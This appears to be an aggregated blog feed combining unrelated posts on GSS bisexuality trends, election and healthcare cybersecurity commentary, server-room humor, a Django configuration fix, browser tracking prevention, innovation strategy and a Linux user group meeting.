I’ve been following a couple different data sets that track the size of the LGB(T) population in the United States for a few years. There’s a good amount of evidence that all points in the same direction: those identifying as lesbian, gay, bisexual, and possibly transgender too are all on the rise. Just how large of an increase is subject to a bit of disagreement, but the larger trend is undeniable. Much of the reporting on this shift treats this as a fact that equally blankets the entirety of the U.S. population (or only deals superficially with the really interesting demographic questions concerning the specific groups within the population that account for this change).

In a previous post, I separated the L’s, G’s and B’s because I suspected that more of this shift was accounted for by bisexuals than is often discussed in any critical way (*the GSS does not presently have a question that allows us to separate anyone identifying as transgender or outside the gender binary). Between 2008 and 2016, the proportion of the population identifying as lesbian or gay went from 1.6% to 2.4%. During the same period, those identifying as bisexual jumped from 1.1% to 3.3%. It’s a big shift and it’s even bigger when you look at how pronounced it is among the groups who primarily account for this change: women, people of color, and young people.

The thing about sexual identities though, is that they’re just like other kinds of meaningful identities in that they intersect with other identities in ways that produce different sorts of meanings depending upon what kinds of configurations of identities they happen to be combined with (like age, race, and gender). For instance, as a sexual identity, bisexual is more common than both lesbian and gay combined. But, bisexuality is gendered. Among women, “bisexual” is a more common sexual identity than is “lesbian”; but among men, “gay” is a more common sexual identity than “bisexual”–though this has shifted a bit over the 8 years GSS has been asking questions about sexual orientation. And so too is bisexuality a racialized identity in that the above gendered trend is more true of white and black men than men of other races.

Consider this: between 2008 and 2016, among young people (18-34 years old), those identifying as lesbian or gay went from 2.7% to 3.0%, while those identifying as “bisexual” increased twofold, from 2.6% to 5.3%.  But, look at how this more general change among young people looks when we break it down by gender.
Picture1

Looked at this way, bisexuality as a sexual identity has more than doubled in recent years. Among 18-34 year old women in 2016, the GSS found 8% identifying as bisexual.  You have to be careful with GSS data once you start parsing the data too much as the sample sizes decrease substantially once we start breaking things down by more than gender and age. But, just for fun, I wanted to look into how this trend looked when we examined it among different racial groups (GSS only has codes for white, black, and other).Picture1

Here, you can see a couple things.  But one of the big stories I see is that “bisexual” identity appears to be particularly absent among Black men in the U.S. And, among young men identifying as a race other than Black or white, bisexuality is a much more common identity than is gay. It’s also true that the proportions of gay and bisexual men in each group appear to jump around year to year.  The general trend follows the larger pattern – toward more sexual minority identities.  But, it’s less straightforward than that when we actually look at the shift among a few specific racial groups within one gender.  Now, look at this trend among women.

Picture1
Here, we clearly see the larger trend that “bisexual” appears to be a more common sexual identity than “lesbian.” But, look at Black women in 2016.  In 2016, just shy of one in five Black women between the ages of 18 and 34 identified as lesbian or bisexual (19%) in the GSS sample! And about two thirds of those women are identifying as bisexual (12.4%) rather than as lesbian (6.6%). Similarly, and mirroring the larger trend that “bisexual” is more common among women while “gay” is more popular among men, “lesbian” is a noticeably absent identity among women identifying as a race other than Black or white just as “gay” is less present among men identifying as a race other than Black or white.

Below is all that information in a single chart.  I felt it was a little less intuitive to read in this form. But this is the combined information from the two graphs preceding this if it’s helpful to see it in one chart.

Picture1

What these shifts mean is a larger question. But it’s one that will require an intersectional lens to interpret. And this matters because bisexuality is a less-discussed sexual identification–so much so that “bi erasure” is used to address the problem of challenging the legitimacy or even existence of this sexual identity. As a sexual identification in the U.S., however, “bisexual” is actually more common than “gay” and “lesbian” identifications combined.

And yet, whether bisexual identifying people will or do see themselves as part of a distinct sexual minority is more of an open question. All of this makes me feel that we need to consider more carefully whether grouping bisexuals with lesbian women and gay men when reporting shifts in the LGB population. Whatever is done, we should care about bisexuality (particularly among women), because this is a sexual identification that is becoming much more common than is sometimes recognized.

Tristan Bridges, PhD is a professor at The College at Brockport, SUNY. He is the co-editor of Exploring Masculinities: Identity, Inequality, Inequality, and Change with C.J. Pascoe and studies gender and sexual identity and inequality. You can follow him on Twitter here. Tristan also blogs regularly at Inequality by (Interior) Design.

(View original at https://thesocietypages.org/socimages)

CryptogramHealthcare Industry Cybersecurity Report

New US government report: "Report on Improving Cybersecurity in the Health Care Industry." It's pretty scathing, but nothing in it will surprise regular readers of this blog.

It's worth reading the executive summary, and then skimming the recommendations. Recommendations are in six areas.

The Task Force identified six high-level imperatives by which to organize its recommendations and action items. The imperatives are:

  1. Define and streamline leadership, governance, and expectations for health care industry cybersecurity.

  2. Increase the security and resilience of medical devices and health IT.

  3. Develop the health care workforce capacity necessary to prioritize and ensure cybersecurity awareness and technical capabilities.

  4. Increase health care industry readiness through improved cybersecurity awareness and education.

  5. Identify mechanisms to protect research and development efforts and intellectual property from attacks or exposure.

  6. Improve information sharing of industry threats, weaknesses, and mitigations.

News article.

Slashdot thread.

Worse Than FailureClassic WTF: Server Room Fans and More Server Room Fun

The Daily WTF is taking a short summer break this week, and as the temperatures around here are edging up towards "Oh God I Want to Die" degrees Fahrenheit, I thought it'd be great to kick off this week of classic articles with some broiling hot server room hijinks. -- Remy

"It's that time of year again," Robert Rossegger wrote, "you know, when the underpowered air conditioner just can't cope with the non-winter weather? Fortunately, we have a solution for that... and all we need to do is just keep an extra eye on people walking near the (completely ajar) server room door."

 

"For as long as anyone can remember," Mike E wrote, "the fax machine in one particular office was a bit spotty whenever it was wet out. After having the telco test the lines from the DMARC to the office, I replaced the hardware, looked for water leaks all along the run, and found precisely nothing. The telco disavowed all responsibility, so the best solution I could offer was to tell the users affected by this to look out the window and, if raining, go to another fax machine."

"One day, we had the telco out adding a T1 and they had the cap off of the vault where our cables come in to the building. Being curious by nature, I wandered over when nobody was around and wound up taking this picture. After emailing same to the district manager of the telco, suddenly we had the truck out for an extra day (accompanied by one very sullen technician) and the fax machine worked perfectly from then on."

 

"I found this when I came back in to work after some time off," writes Sam Nicholson, "that drive is actually earmarked for 'off-site backup'. Also, this is what passes for a server rack at this particular software company. Yes, it's made of wood."

 

"Some people use 'proper electrical wiring'," writes Mike, "others use 'extension cords'. We, on the other hand, apparently do this."

 

"I was staying at a hotel in Manhattan and somehow took a wrong turn and wound up in the stairwell," wrote Dan, "not only is all their equipment in a public place (without even a door), it's mostly hanging from cables in several places."

 

"I spotted this in China," writes Matt, "This poor switch was bolted to a column in the middle of some metal shop about 4m above ground. There were many more curious things, but I decided to keep a low profile and stop taking pictures."

 

[Advertisement] Infrastructure as Code built from the start with first-class Windows functionality and an intuitive, visual user interface. Download Otter today!

,

Planet Linux AustraliaOpenSTEM: This Week in HASS – term 2, week 9

The OpenSTEM™ Understanding Our World® units have only 9 weeks per term, so this is the last week! Our youngest students are looking at some Aboriginal Places; slightly older older students are thinking about what their school and local area were like when their parents and grandparents were children; and students in years 3 to 6 are completing their presentations and anything else that might be outstanding from the term.

Foundation/Prep/Kindy

Students in the stand-alone Foundation/Prep/Kindy class (Unit F.2) examine Aboriginal Places this week. Students examine which places are special to Aboriginal people, and how these places should be cared for by Aboriginal people and the broader community. Several of the Australian places in the Aunt Madge’s Suitcase Activity can be used to support this discussion in the classroom. Students in an integrated Foundation/Prep/Kindy and Year 1 class (Unit F.6), as well as Year 1 (Unit 1.2), 2 (Unit 2.2) and 3 (Unit 3.2) students consider life in the times of their parents and grandparents, with specific reference to their school, or the local area studied during this unit. Teachers may wish to invite older members of the community (including interested parents and/or grandparents) in to the class to describe their memories of the area in former years. Were any of them past students of the school? This is a great opportunity for students to come up with their own questions about life in past times.

Years 3 to 6

Aunt Madge

Students in Year 3 (Unit 3.6), 4 (Unit 4.2), 5 (Unit 5.2) and 6 (Unit 6.2) are finishing off their presentations and any outstanding work this week. Sometimes the middle of term can be very rushed and so it’s always good to have some breathing space at the end to catch up on anything that might have been squeezed out before. For those classes where everyone is up-to-date and looking for extra activities, the Aunt Madge’s Suitcase Activity is always popular with students and can be used to support their learning. Teachers may wish to select a range of destinations appropriate to the work covered during the term and encourage students to think about how those destinations relate to the material covered in class. Destinations may be selected by continent or theme – e.g. natural places or historical sites. A further advantage of Aunt Madge is that the activity can be tailored to fit the available time – from 5 or 10 minutes for a single destination, to 45 minutes or more for a full selection; and played in groups, or as a whole class, allowing some students to undertake the activity while other students may be catching up on other work. Students may also wish to revisit aspects of the Ancient Sailing Ships Activity and expand on their investigations.

Although this is the last week of this term’s units, we will have some more suggestions for extra activities next week – particularly those that keep the students busy while teachers attend to marking or compiling of reports.

Don MartiApple's kangaroo cookie robot

I'm looking forward to trying "Intelligent Tracking Prevention" in Apple Safari. But first, let's watch an old TV commercial for MSN.

Today, a spam filter seems like a must-have feature for any email service. But MSN started talking about its spam filtering back when Sanford Wallace, the "Spam King," was saying stuff like this.

I have to admit that some people hate me, but I have to tell you something about hate. If sending an electronic advertisement through email warrants hate, then my answer to those people is "Get a life. Don't hate somebody for sending an advertisement through email." There are people out there that also like us.

According to spammers, spam filtering was just Internet nerds complaining about something that regular users actually like. But the spam debate ended when big online services, starting with MSN, started talking about how they build for their real users instead of for Wallace's hypothetical spam-loving users.

If you missed the email spam debate, don't worry. Wallace's talking points about spam filters constantly get recycled by surveillance marketers talking about tracking protection. But now it's not email spam that users supposedly crave. Today, the Interactive Advertising Bureau tells us that users want ads that "follow them around" from site to site.

Enough background. Just as the email spam debate ended with MSN's campaign, the third-party web tracking debate ended on June 5, 2017.

With Intelligent Tracking Prevention, WebKit strikes a balance between user privacy and websites’ need for on-device storage. That said, we are aware that this feature may create challenges for legitimate website storage, i.e. storage not intended for cross-site tracking.

If you need it in bullet points, here it is.

  • Nifty machine learning technology is coming in on the user's side.

  • "Legitimate" uses do not include cross-site tracking.

  • Safari's protection is automatic and client-side, so no blocklist politics.

Surveillance marketers come up with all kinds of hypothetical reasons why users might prefer targeted ads. But in the real world, Apple invests time and effort to understand user experience. When Apple communicates about a feature, it's because that feature is likely to keep a user satisfied enough to buy more Apple devices. We can't read their confidential user research, but we can see what the company learned from it based on how they communicate about products.

(Imagine for a minute that Apple's user research had found that real live users are more like the Interactive Advertising Bureau's idea of a user. We might see announcements more like "Safari automatically shares your health and financial information with brands you love!" Anybody got one of those to share?)

Saving an out-of-touch ad industry

Advertising supports journalism and cultural works that would not otherwise exist. It's too important not to save. Bob Hoffman asks,

[H]ow can we encourage an acceptable version of online advertising that will allow us to enjoy the things we like about the web without the insufferable annoyance of the current online ad model?

The browser has to be part of the answer. If the browser does its job, as Safari is doing, it can play a vital role in re-connecting users with legit advertising—just as users have come to trust legit email newsletters now that they have effective spam filters.

Safari's Intelligent Tracking Prevention is not the final answer any more than Paul Graham's "A plan for spam" was the final spam filter. Adtech will evade protection tools just as spammers did, and protection will have to keep getting better. But at least now we can finally say debate over, game on.

With New Browser Tech, Apple Preserves Privacy and Google Preserves Trackers

An Ad Network That Works With Fake News Sites Just Launched An Anti–Fake News Initiative

Google Slammed For Blocking Ads While Allowing User Tracking

Introducing FilterBubbler: A WebExtension built using React/Redux

Forget far-right populism – crypto-anarchists are the new masters

Risks to brands under new EU regulations

Breitbart ads plummet nearly 90 percent in three months as Trump’s troubles mount

Be Careful Celebrating Google’s New Ad Blocker. Here’s What’s Really Going On.

‘We know the industry is a mess’: Marketers share challenges at Digiday Programmatic Marketing Summit

FIREBALL – The Chinese Malware of 250 Million Computers Infected

Verified bot laundering 2. Not funny. Just die

Publisher reliance on tech providers is ‘insane’: A Digiday+ town hall with The Washington Post’s Jarrod Dicker

Why pseudonymization is not the silver bullet for GDPR.

A level playing field for companies and consumers

Planet Linux AustraliaFrancois Marier: Mysterious 400 Bad Request in Django debug mode

While upgrading Libravatar to a more recent version of Django, I ran into a mysterious 400 error.

In debug mode, my site was working fine, but with DEBUG = False, I would only a page containing this error:

Bad Request (400)

with no extra details in the web server logs.

Turning on extra error logging

To see the full error message, I configured logging to a file by adding this to settings.py:

LOGGING = {
    'version': 1,
    'disable_existing_loggers': False,
    'handlers': {
        'file': {
            'level': 'DEBUG',
            'class': 'logging.FileHandler',
            'filename': '/tmp/debug.log',
        },
    },
    'loggers': {
        'django': {
            'handlers': ['file'],
            'level': 'DEBUG',
            'propagate': True,
        },
    },
}

Then I got the following error message:

Invalid HTTP_HOST header: 'www.example.com'. You may need to add u'www.example.com' to ALLOWED_HOSTS.

Temporary hack

Sure enough, putting this in settings.py would make it work outside of debug mode:

ALLOWED_HOSTS = ['*']

which means that there's a mismatch between the HTTP_HOST from Apache and the one that Django expects.

Root cause

The underlying problem was that the Libravatar config file was missing the square brackets around the ALLOWED_HOSTS setting.

I had this:

ALLOWED_HOSTS = 'www.example.com'

instead of:

ALLOWED_HOSTS = ['www.example.com']

,

CryptogramFriday Squid Blogging: Sex Is Traumatic for the Female Dumpling Squid

The more they mate, the sooner they die. Academic paper (paywall). News article.

As usual, you can also use this squid post to talk about the security stories in the news that I haven't covered.

Read my blog posting guidelines here.

CryptogramNSA Document Outlining Russian Attempts to Hack Voter Rolls

This week brought new public evidence about Russian interference in the 2016 election. On Monday, the Intercept published a top-secret National Security Agency document describing Russian hacking attempts against the US election system. While the attacks seem more exploratory than operational ­-- and there's no evidence that they had any actual effect ­-- they further illustrate the real threats and vulnerabilities facing our elections, and they point to solutions.

The document describes how the GRU, Russia's military intelligence agency, attacked a company called VR Systems that, according to its website, provides software to manage voter rolls in eight states. The August 2016 attack was successful, and the attackers used the information they stole from the company's network to launch targeted attacks against 122 local election officials on October 27, 12 days before the election.

That is where the NSA's analysis ends. We don't know whether those 122 targeted attacks were successful, or what their effects were if so. We don't know whether other election software companies besides VR Systems were targeted, or what the GRU's overall plan was -- if it had one. Certainly, there are ways to disrupt voting by interfering with the voter registration process or voter rolls. But there was no indication on Election Day that people found their names removed from the system, or their address changed, or anything else that would have had an effect -- anywhere in the country, let alone in the eight states where VR Systems is deployed. (There were Election Day problems with the voting rolls in Durham, NC ­-- one of the states that VR Systems supports ­-- but they seem like conventional errors and not malicious action.)

And 12 days before the election (with early voting already well underway in many jurisdictions) seems far too late to start an operation like that. That is why these attacks feel exploratory to me, rather than part of an operational attack. The Russians were seeing how far they could get, and keeping those accesses in their pocket for potential future use.

Presumably, this document was intended for the Justice Department, including the FBI, which would be the proper agency to continue looking into these hacks. We don't know what happened next, if anything. VR Systems isn't commenting, and the names of the local election officials targeted did not appear in the NSA document.

So while this document isn't much of a smoking gun, it's yet more evidence of widespread Russian attempts to interfere last year.

The document was, allegedly, sent to the Intercept anonymously. An NSA contractor, Reality Leigh Winner, was arrested Saturday and charged with mishandling classified information. The speed with which the government identified her serves as a caution to anyone wanting to leak official US secrets.

The Intercept sent a scan of the document to another source during its reporting. That scan showed a crease in the original document, which implied that someone had printed the document and then carried it out of some secure location. The second source, according to the FBI's affidavit against Winner, passed it on to the NSA. From there, NSA investigators were able to look at their records and determine that only six people had printed out the document. (The government may also have been able to track the printout through secret dots that identified the printer.) Winner was the only one of those six who had been in e-mail contact with the Intercept. It is unclear whether the e-mail evidence was from Winner's NSA account or her personal account, but in either case, it's incredibly sloppy tradecraft.

With President Trump's election, the issue of Russian interference in last year's campaign has become highly politicized. Reports like the one from the Office of the Director of National Intelligence in January have been criticized by partisan supporters of the White House. It's interesting that this document was reported by the Intercept, which has been historically skeptical about claims of Russian interference. (I was quoted in their story, and they showed me a copy of the NSA document before it was published.) The leaker was even praised by WikiLeaks founder Julian Assange, who up until now has been traditionally critical of allegations of Russian election interference.

This demonstrates the power of source documents. It's easy to discount a Justice Department official or a summary report. A detailed NSA document is much more convincing. Right now, there's a federal suit to force the ODNI to release the entire January report, not just the unclassified summary. These efforts are vital.

This hack will certainly come up at the Senate hearing where former FBI director James B. Comey is scheduled to testify Thursday. Last year, there were several stories about voter databases being targeted by Russia. Last August, the FBI confirmed that the Russians successfully hacked voter databases in Illinois and Arizona. And a month later, an unnamed Department of Homeland Security official said that the Russians targeted voter databases in 20 states. Again, we don't know of anything that came of these hacks, but expect Comey to be asked about them. Unfortunately, any details he does know are almost certainly classified, and won't be revealed in open testimony.

But more important than any of this, we need to better secure our election systems going forward. We have significant vulnerabilities in our voting machines, our voter rolls and registration process, and the vote tabulation systems after the polls close. In January, DHS designated our voting systems as critical national infrastructure, but so far that has been entirely for show. In the United States, we don't have a single integrated election. We have 50-plus individual elections, each with its own rules and its own regulatory authorities. Federal standards that mandate voter-verified paper ballots and post-election auditing would go a long way to secure our voting system. These attacks demonstrate that we need to secure the voter rolls, as well.

Democratic elections serve two purposes. The first is to elect the winner. But the second is to convince the loser. After the votes are all counted, everyone needs to trust that the election was fair and the results accurate. Attacks against our election system, even if they are ultimately ineffective, undermine that trust and ­-- by extension ­-- our democracy. Yes, fixing this will be expensive. Yes, it will require federal action in what's historically been state-run systems. But as a country, we have no other option.

This essay previously appeared in the Washington Post.

TEDTwo surprising strategies for effective innovation

Picture this: Three kids are given a LEGO set with the pieces to build a fire department. All of them want to build as many new toys as possible.

The first kid goes straight for the easy wins. He puts a tiny red hat on a tiny minifig: presto, a firefighter! In this way, he quickly makes several simple toys. The second kid goes by intuition. He chooses the pieces he’s drawn to and imagines how he could combine them. The third takes a different strategy altogether: She picks up axles, wheels, base plates; pieces she can’t use now but knows she’ll need later if she wants to build complex toys.

By the time they’re finished playing, which kid will have created the most new toys?

Common lore favors the second kid’s strategy — innovation by intuition or visionary foresight. “Innovation has been more of an art than a science,” says Martin Reeves (TED Talk: How to build a business that lasts 100 years), a senior partner and managing director at BCG, and global director of BCG’s think tank. “We think it’s dependent on intuition or personality or luck.”

A new study, led by Reeves and Thomas Fink from the London Institute of Mathematical Sciences, shows that’s not the case.

“Innovation is an unpredictable process, but one with predictable features,” says Reeves. “It’s not just a matter of luck. It’s possible to have a strategy of innovation.”

The study found that the second kid, guided only by intuition and vision, is the least likely to succeed. The other two are the ones to emulate, but the secret is knowing how and when to use each of their tactics.   

The Impatient Strategy

Let’s go back to the first kid, the one who started by putting hats on the figurines. His strategy is familiar to entrepreneurs: he’s creating the minimum viable product, or the simplest, fastest version of a finished product.

Reeves calls that an “impatient strategy.” It’s fast, iterative, and bare bones.  

When you’re breaking into a market that’s fairly new, an impatient strategy is the best way to go. “Look for simple solutions,” says Reeves.    

For example, that’s what Uber did when it first launched. The industry was young and easy to disrupt, so the app combined technologies that already existed to create a simple black-car service. Only later did it become the sprawling company it is today, looking ahead to things like the future of self-driving cars.   

The Patient Strategy

An impatient strategy might be effective early on, but eventually, it stops working.

Enter the third kid from our LEGO story. She’s not worried about speed; she’s focused on the end point she wants to reach. It’ll take her longer to build a toy, but she’s more likely to create a toy that’s elaborate (think: a fire truck) and more sophisticated than the first kid’s firefighters in hats. 

Reeves calls this a “patient strategy.” It’s complex, forward-looking, and relatively slow.   

A patient strategy is too costly for most startups. It requires resources and access, and it risks investing a lot in a product that doesn’t take off. “It becomes a big company game,” says Reeves.  

For example, Apple is known to make investments in technologies that often pay off later, many years after acquisition or initial patenting. That’s the hallmark of a patient strategy.    

When to Switch Your Strategy  

The most successful entrepreneurs use both strategies. They’re fast and agile when their industry is young; patient and forward-looking as their industry gets more advanced.  

How do you know when to switch? “Think of this as a search,” says Reeves. “Understand the maturity of your space by looking at the complexity of the products that you and your competitors are creating.”  

As the products get more complex, your strategy should get more patient.

Of course, the rest of the business needs to follow suit. “Adjust all aspects of your business to match your strategy,” says Reeves. “An impatient strategy is fast and agile, but you also need to prepare yourself to change your approach and structure later.”


Sociological ImagesMocking perfect gender performances (because the rule is to break rules)

Both men and women face a lot of pressure to perform masculinity and femininity respectively. But, ironically, people who rigidly conform to rules about gender, those who enact perfect performances of masculinity or femininity, are often the butt of jokes. Many of us, for example, think the male body builder is kind of gross; we suspect that he may be compensating for something, dumb like a rock, or even narcissistic. Likewise, when we see a bleach blond teetering in stilettos and pulling up her strapless mini, many of us think she must be stupid and shallow, with nothing between her ears but fashion tips.

The fact that we live in a world where there are different expectations for men’s and women’s behavior, in other words, doesn’t mean that we’re just robots acting out those expectations. We actually tend to mock slavish adherence to those rules, even as we carefully negotiate them (breaking some rules, but not too many, and not the really important ones).

In any case, I thought of this when I saw this ad. The woman at the other end of the table is doing (at least some version of) femininity flawlessly.  The hair is perfect, her lips exactly the right shade of pink, her shoulders are bare. But… it isn’t enough.  The man behind the menu has “lost interest.”

It’s unfortunate that we spend so much time telling women that the most important thing about them is that they conform to expectations of feminine beauty when, in reality, living up to those expectations means performing an identity that we disdain.

We do it to men, too.  We expect guys to be strictly masculine, and when they turn out to be jocks and frat boys, we wonder why they can’t be nicer or more well-rounded.

Lisa Wade, PhD is a professor at Occidental College. She is the author of American Hookup, a book about college sexual culture, and a textbook about gender. You can follow her on Twitter, Facebook, and Instagram.

(View original at https://thesocietypages.org/socimages)

Worse Than FailureError'd: Know Your Bits!

"I know software can't always be perfect, but things like this make me want to shut down my PC and say that's enough computering for the day," writes Timothy W.

 

Richard S. wrote, "I suppose you don't really need an email body when you have everything you need in the subject."

 

"I recently inherited a project from a contractor that left the project," writes Michael H., "I have never seen code quite like his, and that is NOT a compliment."

 

Bruce C. writes, "The fact that this won't ship to NZ is kind of immaterial - the REAL question is do I feel like spending $10.95 for new or can I settle for used at a discount?"

 

"I'm sure their product is great, but I don't want to be an early adopter if I can help it," writes Jaime A.

 

"To be fair, the email did catch my attention," wrote Philip G.

 

[Advertisement] Release! is a light card game about software and the people who make it. Play with 2-5 people, or up to 10 with two copies - only $9.95 shipped!

Planet Linux AustraliaLinux Users of Victoria (LUV) Announce: LUV Beginners June Meeting: Debian 9 release party!

Jun 17 2017 12:30
Jun 17 2017 16:30
Jun 17 2017 12:30
Jun 17 2017 16:30
Location: 
Infoxchange, 33 Elizabeth St. Richmond

Debian Linux version 9 (codename "Stretch") is scheduled for release on 17 June 2017.  Join us in celebrating the release and assisting anyone who would like to install or upgrade to the new version!


There will also be the usual casual hands-on workshop, Linux installation, configuration and assistance and advice. Bring your laptop if you need help with a particular issue. This will now occur BEFORE the talks from 12:30 to 14:00. The talks will commence at 14:00 (2pm) so there is time for people to have lunch nearby.

The meeting will be held at Infoxchange, 33 Elizabeth St. Richmond 3121 (enter via the garage on Jonas St.) Late arrivals, please call (0421) 775 358 for access to the venue.

LUV would like to acknowledge Infoxchange for the venue.

Linux Users of Victoria Inc., is an incorporated association, registration number A0040056C.

June 17, 2017 - 12:30

,

CryptogramSafety and Security and the Internet of Things

Ross Anderson blogged about his new paper on security and safety concerns about the Internet of Things. (See also this short video.)

It's very much along the lines of what I've been writing.